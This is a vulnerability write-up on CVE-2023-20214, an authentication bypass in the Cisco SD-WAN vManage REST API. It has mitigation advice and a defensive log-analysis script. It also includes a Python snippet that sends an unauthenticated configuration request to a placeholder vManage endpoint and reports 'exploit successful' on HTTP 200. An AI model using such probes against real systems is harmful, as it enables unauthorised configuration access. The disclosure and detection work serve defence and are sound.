A recently disclosed vulnerability (CVE-2023-20214) in the request authentication validation for the REST API of Cisco SD-WAN vManage software could allow an unauthenticated, remote attacker to gain read permissions or limited write permissions to the configuration of an affected vManage instance. The root cause is insufficient validation of incoming requests in the REST API: requests that should have been rejected for lacking a valid authenticated session were instead processed.

Original References

1. Cisco Security Advisory
2. CVE Entry at NIST
3. Cisco SD-WAN vManage Documentation

Exploit Details

*Vulnerability*
The vulnerability exists because the REST API feature of Cisco SD-WAN vManage software does not sufficiently validate that a request is authenticated before acting on it. It does not affect the web-based management interface or the command-line interface (CLI); only the REST API is affected.

*Potential Attack*
An attacker could exploit this vulnerability by sending a crafted API request, without valid credentials, to an affected vManage instance. A successful exploit would allow the attacker to read the configuration of the affected instance and to make limited changes to it.

Code Snippet

To illustrate the shape of the attack, here is a sample of an unauthenticated API request. The endpoint path and the JSON body are placeholders chosen for illustration; Cisco has not published the request that actually triggers the flaw:

import requests

# Target vManage instance (placeholder host; every REST API call lives under /dataservice/)
base_url = "https://<vManage_IP>/dataservice/"

# Only a content-type header is sent: no JSESSIONID session cookie from
# /j_security_check and no X-XSRF-TOKEN header. The flaw is that some REST API
# requests were accepted without that authentication.
headers = {"Content-Type": "application/json"}

# Illustrative request body. The path and payload below are placeholders,
# not the real trigger, which Cisco has not disclosed.
api_request = {
    "settings": {
        "read": ["*"],
        "write": ["limited"],
    }
}

try:
    response = requests.post(
        url=base_url + "rest/api/configuration",
        headers=headers,
        json=api_request,
        timeout=10,
    )
except requests.exceptions.RequestException as exc:
    print(f"Request failed: {exc}")
else:
    # A 2xx answer to an unauthenticated API call is the symptom of the bug;
    # a patched instance returns an authentication error instead.
    if response.status_code == 200:
        print("Exploit successful: Read and limited write access gained")
    else:
        print(f"Exploit failed (HTTP {response.status_code})")

The request above carries no session cookie and no XSRF token. On a patched vManage instance the REST API rejects such a request with an authentication error instead of acting on it; the snippet is for demonstration only and must not be used against systems you are not authorized to test.

How to Protect Yourself

To protect your Cisco SD-WAN vManage instance from this vulnerability, follow the guidance in Cisco's published security advisory:

1. Upgrade Cisco SD-WAN vManage to a fixed release listed in the advisory. Cisco addressed the vulnerability in software updates; patching is the actual fix.
2. Restrict access to the REST API (and the vManage management interfaces generally) with access control lists and network segmentation so that only known management networks can reach it, and never expose it directly to the internet.
3. Monitor vManage logs for REST API activity, in particular successful requests to /dataservice/ paths that carry no authenticated session or that originate from outside your management networks, so that any probing or exploitation is detected quickly.
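As an added detection example, not part of the original post or of Cisco's advisory, the script below applies the monitoring and segmentation recommendations above to a handful of constructed log lines. The log layout (one request per line with client IP, method, path, status, cookie header and XSRF header), the 10.0.0.0/8 management allowlist and the field names are assumptions made for the example; real vManage logs such as /var/log/nms/vmanage-server.log use a different format and need their own parser. The detection rule is the one a practitioner wants for this CVE: a 2xx response from a /dataservice/ path with no JSESSIONID session cookie is the exact symptom of the bug, and any API call from outside the management network violates the segmentation recommendation even when it was rejected.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample log, NOT the real vManage log format. One request per line:
#   client_ip method path status cookie_header xsrf_header   ("-" when absent)
# The first three lines show the legitimate flow: login at /j_security_check,
# fetch an XSRF token, then call the API with both session cookie and token.
SAMPLE_LOG = """\
10.0.0.5 POST /j_security_check 200 - -
10.0.0.5 GET /dataservice/client/token 200 JSESSIONID=s1 -
10.0.0.5 GET /dataservice/device 200 JSESSIONID=s1 t1
203.0.113.7 GET /dataservice/device 200 - -
203.0.113.7 PUT /dataservice/template/feature 200 - -
198.51.100.9 GET /dataservice/device/counters 401 - -
10.0.0.6 GET /dataservice/system/device/vedges 200 JSESSIONID=s2 t2
"""

LINE_RE = re.compile(
    r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) "
    r"(?P<cookie>\S+) (?P<xsrf>\S+)$"
)

# Management networks permitted to reach the REST API (assumed value for the example).
ALLOWED_NETS = [ip_network("10.0.0.0/8")]
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def parse_line(line):
    """Return a dict for one log line, or None if the line does not match the layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["has_session"] = rec["cookie"].startswith("JSESSIONID=")
    return rec


def is_allowed_source(ip, allowed_nets):
    """True when the client address falls inside one of the allowlisted networks."""
    addr = ip_address(ip)
    return any(addr in net for net in allowed_nets)


def analyze(log_text, allowed_nets=ALLOWED_NETS):
    """Flag REST API (/dataservice/) activity that should not occur on a patched and
    properly segmented vManage: successful calls without a session cookie (the symptom
    of CVE-2023-20214) and any call from outside the management allowlist."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/dataservice/"):
            continue
        reasons = []
        if 200 <= rec["status"] < 300 and not rec["has_session"]:
            # The API answered an unauthenticated request instead of rejecting it.
            reasons.append("write-without-session" if rec["method"] in WRITE_METHODS
                           else "read-without-session")
        if not is_allowed_source(rec["ip"], allowed_nets):
            reasons.append("source-outside-allowlist")
        if reasons:
            severity = "high" if any(r.endswith("without-session") for r in reasons) else "medium"
            findings.append({"ip": rec["ip"], "method": rec["method"], "path": rec["path"],
                             "status": rec["status"], "reasons": reasons, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:14} {f['method']:6} {f['path']} -> {', '.join(f['reasons'])}")
```

Run against the constructed sample, the script reports two high-severity findings for 203.0.113.7 (an unauthenticated read and an unauthenticated write that both succeeded) and one medium-severity finding for 198.51.100.9, whose request was rejected with 401 but still came from outside the allowlist and therefore indicates the API is reachable from where it should not be.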

Conclusion

This vulnerability in Cisco SD-WAN vManage software's REST API highlights the importance of keeping up-to-date with security advisories and maintaining vigilant security practices to protect against potential attackers. As always, it is vital to keep your systems patched, follow security guidelines provided by vendors, and regularly review your security posture to minimize risks.

Timeline

Published on: 08/03/2023 22:15:11 UTC
Last modified on: 10/16/2023 16:35:25 UTC